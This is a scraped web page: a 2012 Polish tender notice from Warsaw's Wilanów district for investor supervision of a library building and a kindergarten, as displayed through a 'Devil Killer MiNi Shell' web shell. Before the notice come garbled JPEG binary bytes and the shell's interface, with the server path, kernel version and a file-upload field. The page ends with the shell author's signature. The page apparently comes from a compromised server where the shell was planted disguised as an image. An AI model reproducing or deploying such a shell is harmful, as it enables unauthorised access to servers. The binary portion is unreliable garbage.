JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/238027-N-2012.html

<p class="kh_header"><b>Warszawa: Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją przedsięwzięć inwestycyjnych pn.: Budowa budynku użyteczności publicznej przy ul. Kolegiackiej 3 w Warszawie oraz pn.: Budowa przedszkola przy ul. Św. Urszuli Ledóchowskiej w Warszawie</b><br>
<b>Numer ogłoszenia: 238027 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Wilanów , ul.  Stanisława Kostki Potockiego 11, 02-958 Warszawa, woj. mazowieckie, tel. 22 6426001 w. 407, faks 22 6427643.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją przedsięwzięć inwestycyjnych pn.: Budowa budynku użyteczności publicznej przy ul. Kolegiackiej 3 w Warszawie oraz pn.: Budowa przedszkola przy ul. Św. Urszuli Ledóchowskiej w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie podzielone jest na 2 części, w tym:
- część nr 1 - Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją przedsięwzięcia inwestycyjnego pn.: Budowa budynku użyteczności publicznej przy ul. Kolegiackiej 3 w Warszawie
- część nr 2 - Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją przedsięwzięcia inwestycyjnego pn.: Budowa przedszkola przy ul. Św. Urszuli Ledóchowskiej w Warszawie
2. Każdy z wykonawców może złożyć ofertę na dowolną liczbę części, przy czym na każdą część wykonawca może złożyć tylko jedną ofertę. 
3. Oferty porównywane i oceniane będą osobno dla każdej części zamówienia (dot. oferentów składających oferty na dwie części zamówienia).
4. Dla każdej części zamówienia zostanie podpisana odrębna umowa z wykonawcą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających dla części nr 1 i nr 2 zamówienia, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest, najpóźniej do dnia 20.11.2012 r. do godz. 12:00, wnieść wadium dla części nr 1 zamówienia w kwocie 3.200,00 zł (słownie: trzy tysiące dwieście złotych 00/100) i/lub dla części nr 2 zamówienia 5.000,00 zł (słownie: pięć tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania wiedzy i doświadczenia Zamawiający wymaga:
dla części nr 1 zamówienia: wykazu co najmniej 2 usług, przy czym każda z nich musi polegać na prowadzeniu nadzoru inwestorskiego przy remoncie, budowie, przebudowie lub rozbudowie budynku o kubaturze nie mniejszej niż 10.000 m3, w której wartość prowadzonych robót ogólnobudowlanych nie była niższa niż 3.000.000,00 zł brutto, wartość robót instalacyjnych sanitarnych nie była niższa niż 2.000.000,00 zł brutto i wartość robót instalacyjnych elektrycznych nie była niższa niż 500.000,00 zł brutto, wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
dla części nr 2 zamówienia: wykazu co najmniej 2 usług, przy czym każda z nich musi polegać na prowadzeniu nadzoru inwestorskiego przy budowie, przebudowie lub rozbudowie budynku o kubaturze nie mniejszej niż 10.000 m3, w której wartość prowadzonych robót ogólnobudowlanych nie była niższa niż 3.000.000,00 zł brutto, wartość prowadzonych robót instalacyjnych sanitarnych nie była niższa niż 1.500.000,00 zł brutto, wartość prowadzonych robót instalacyjnych elektrycznych nie była niższa niż 500.000,00 zł brutto, wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga:
a) dla części nr 1 zamówienia: wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, w tym co najmniej:
- 1 osobę pełniącą funkcję koordynatora pracy inspektorów nadzoru na budowie,
- 1 osobę posiadająca co najmniej 5 lat uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności konstrukcyjno-budowlanej,
- 1 osobę posiadająca co najmniej 5 lat uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
- 1 osobę posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
dla części nr 2 zamówienia: wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, w tym co najmniej:
- 1 osobę pełniącą funkcję koordynatora pracy inspektorów nadzoru na budowie,
- 1 osobę posiadająca co najmniej 5 lat uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności konstrukcyjno-budowlanej,
- 1 osobę posiadająca co najmniej 5 lat uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
- 1 osobę posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
- 1 osobę posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności drogowej;
b) dla części nr 1 i nr 2 zamówienia: oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Oferty - wg wzoru stanowiącego załącznik nr 1 i/lub 2 do SIWZ.
2. Dowód wniesienia wadium dla części nr 1 i/lub nr 2 zamówienia, zgodnie z zasadami wskazanymi w pkt. VI. SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień umowy na warunkach określonych we wzorze umowy:
1) Strony zastrzegają możliwość zmiany terminu realizacji przedmiotu umowy w okolicznościach od nich niezależnych, a zwłaszcza w przypadku konieczności wydłużenia terminu realizacji robót budowlanych. Zmiany te zostaną odpowiednio wprowadzone aneksem do umowy (§ 2 ust. 2).
2) Zmiany powyżej wymienionych osób (tj. branżowych inspektorów, koordynatora pracy inspektorów nadzoru na budowie) może nastąpić w formie powiadomienia i nie wymaga aneksu do umowy (§ 7 ust. 5).
3) Zmiana kwot wynagrodzenia w poszczególnych latach określonych w ust. 1 lit. a, b i c, bez zmiany kwoty wynagrodzenia ryczałtowego brutto określonego w ust. 1, wymaga aneksu do umowy (§ 9 ust. 5).
4) W przypadku ustawowej zmiany obowiązujących stawek podatku VAT kwota wynagrodzenia brutto pozostaje bez zmian. Kwota wynagrodzenia netto zostanie przeliczona według obowiązujących stawek podatku VAT, w stosunku do kwoty wynagrodzenia bazowego brutto (§ 9 ust. 7).
5) W trakcie realizacji umowy Inspektor może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 148 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2010 r. nr 113 poz. 759 ze zm.). Zmiana formy zabezpieczenia może nastąpić przez powiadomienie i nie wymaga aneksu do umowy (§ 13 ust. 5).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wilanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa Dzielnica Wilanów
Wydział Zamówień Publicznych i Zezwoleń 
ul. Stanisława Kostki Potockiego 11, 02-958 Warszawa
pokój 407.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 12:00, miejsce: Miasto Stołeczne Warszawa Dzielnica Wilanów
Wydział Zamówień Publicznych i Zezwoleń 
ul. Stanisława Kostki Potockiego 11, 02-958 Warszawa
pokój 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją przedsięwzięcia inwestycyjnego pn.: Budowa budynku użyteczności publicznej przy ul. Kolegiackiej 3 w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje kompleksowy nadzór nad robotami w zakresie branży budowlanej, branży sanitarnej i branży elektrycznej związanych z robotami wykończeniowymi budynku użyteczności publicznej przy ul. Kolegiackiej 3 w Warszawie. W budynku znajdą się pomieszczenia biblioteki i pomieszczenia biurowe (na potrzeby Centrum Kultury Wilanów). 
Budynek o kubaturze 16.100 m3, powierzchnia całkowita  6.263,10 m2, wysokość budynku (w kalenicy) 14,04 m. Budynek jest w trakcie budowy.  
Aktualny stan można określić jako surowy zamknięty ocieplony i otynkowany. 
Budynek jest trój-bryłowy i funkcjonalnie składa się zasadniczo z trzech części:
- część południowa nazywana w projekcie budowlanym częścią biblioteczną granicząca z częścią północną ścianą na osi nr 4,
- część północna nazywana w projekcie budowlanym częścią biurową zawiera pomieszczenia na północ od osi nr 4,
- wieża - część przekryta odrębnym zadaszeniem kopertowym mieszcząca piony komunikacyjne i instalacyjne.
Część podziemna budynku to parking na 46 samochodów osobowych.
Na każdej kondygnacji znajdują się sanitariaty obsługujące pomieszczenia biurowe. Najwyższa kondygnacja oraz parking podziemny są dostępne poprzez dwa dźwigi oraz dwie klatki schodowe wschodnią i zachodnią (w wieży).
Pełna dokumentacja na podstawie której realizowane będą roboty wykończeniowe stanowi załącznik do przetargu nr 63/WIR/2012 z dnia 20.09.2012 r. na wybór wykonawcy robót i znajduje się na stronie internetowej Dzielnicy Wilanów (www.wilanow.pl)  w zakładce zamówienia publiczne.
Prace budowlane należy nadzorować zgodnie z przepisami Prawa budowlanego, warunkami technicznymi wykonania i odbioru robót, dokumentacją projektową i sztuką budowlaną.
Inspektorzy nadzoru inwestorskiego pełnić będą obowiązki zgodnie z art. 25 i 26 Prawa budowlanego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją przedsięwzięcia inwestycyjnego pn.: Budowa przedszkola przy ul. Św. Urszuli Ledóchowskiej w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje kompleksowy nadzór nad robotami w zakresie branży budowlanej, branży sanitarnej, branży elektrycznej i branży drogowej związanych z robotami budowy budynku przedszkola przy ul. Św. Urszuli Ledóchowskiej w Warszawie. 
Inwestycja obejmuje realizację: budynku przedszkola, śmietnika, drogi dojazdowej (pożarowej), chodników i parkingów, przyłączy instalacyjnych, ogrodzeń i zagospodarowania terenu wraz z placami zabaw oraz zielenią.
Budynek zaprojektowano jako 2-kondygnacyjny z częściowym podpiwniczeniem. Powierzchnia zabudowy: 1.360 m2, powierzchnia użytkowa: 1.721 m2, powierzchnia całkowita: 3.077 m2,  kubatura: cz. nadziemna 10.930 m3, cz. podziemna 1.896 m3,  wysokość budynku 10 m.
Konstrukcję nośną budynku stanowi szkielet żelbetowy monolityczny, w układzie płytowo-słupowo-ściennym, siatka słupów 6,8m - 7,2 m. Stropy  żelbetowe płytowe krzyżowo-zbrojone, konstrukcja dachów: drewniana oraz żelbetowa, na wejściem - dźwigary stalowe. Ściany zewnętrzne:  piwnic żelbetowe z betonu hydrotechnicznego (wysoki poziom wód gruntowych), parteru i piętra z betonu komórkowego murowane na klej. 
W budynku znajdą się między innymi:
-	sale edukacyjne z zapleczami sanitarnymi i magazynowymi, 
-	sale rekreacyjno-zabawowe,
-	pomieszczenia:  dyrektora, kadry nauczycielskiej, sekretariatu, logopedy, psychologa i pomocy przedmedycznej,
-	kuchnia wraz z zapleczem kuchennym z windą towarową typu microlift dla podawania posiłków, szatnie personelu; 
-	dwie klatki schodowe;
-	taras w konstrukcji aluminiowej, częściowo zadaszony służący jako dodatkowy plac zabaw;
-	pomieszczenia techniczne zlokalizowane w piwnicy;
-	winda osobowa oraz hole i korytarze.
W zakres budowy będą wchodzić następujące elementy: 
-	wykonanie robót związanych z budową obiektu oraz wyposażeniem w instalacje: sanitarną, elektryczną,  centralnego ogrzewania  (węzeł cieplny w piwnicy budynku), wentylacji mechanicznej nawiewno-wyciągowej, teletechniczną z instalacją sieci komputerowej, telefoniczną, antywłamaniową, nagłośnienia i przyzywową,
-	stolarka okienna drewniana, drzwi wewnętrzne z ościeżnicami regulowanymi, ściany kurtynowe o konstrukcji aluminiowej, 
-	roboty wykończeniowe: malowanie farbami lateksowymi i emulsyjnymi, wykładziny typu marmolem, gres, glazura, parkiet drewniany, wykładziny dywanowe, balustrady z wypełnieniem ze szkła bezpiecznego hartowanego,
-	wyposażenie technologiczne kuchni (w tym: trzon kuchenny do gotowania posiłków dla 250 dzieci,
-	podłączenie obiektu do sieci zewnętrznych - przyłącze wodociągowe (około 60 m), kanalizacji sanitarnej (około 100 m) i deszczowej (około 300 m, odprowadzone do istniejącej sieci w ul. Ledóchowskiej za pośrednictwem zbiornika retencyjnego dla wody z dachu  i z zastosowaniem osadników błota (wody z drogi i parkingów), elektroenergetyczne (około 120 m) i teletechniczne (około 100 m), 
-	wykonanie drogi dojazdowej - pożarowej (wraz ze zjazdami) z kostki betonowej - pow. około 860 m2, parkingów z kratki trawnikowej typu Eco-fix wypełnionej ziemią - pow. około 760 m2 i chodników z kostki betonowej - pow. około 233 m2; ścieżka stabilizowana kratka trawnikową - pow. około 136 m2,
-	wykonanie oświetlenia terenu - oprawy na słupach typu parkowego wraz z oświetleniem śmietnika, 
-	wykonanie zagospodarowania terenu (w tym: ścieżka spacerowa stabilizowana kratka trawnikową typu Eco-fix,  stoliki i ławki ogrodowe, stojaki na rowery) wraz z placami zabaw (w tym: 3 urządzenia wielofunkcyjne z nawierzchnią bezpieczną o pow. około 125 m2, piaskownice, karuzele, bujaki i urządzenia wielofunkcyjne na trawie), 
-	wykonanie ogrodzenia ażurowego z profili stalowych z podmurówką,
-	wykonanie wycinki i przesadzenia drzew i krzewów (około 134 szt. w tym 9 szt. do przesadzenia) oraz nowych nasadzeń zieleni ( w tym: klony, brzozy, róże parkowe oraz jodła).
Prace budowlane należy nadzorować zgodnie z przepisami Prawa budowlanego, warunkami technicznymi wykonania i odbioru robót, dokumentacją projektową i sztuką budowlaną.
Inspektorzy nadzoru inwestorskiego pełnić będą obowiązki zgodnie z art. 25 i 26 Prawa budowlanego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com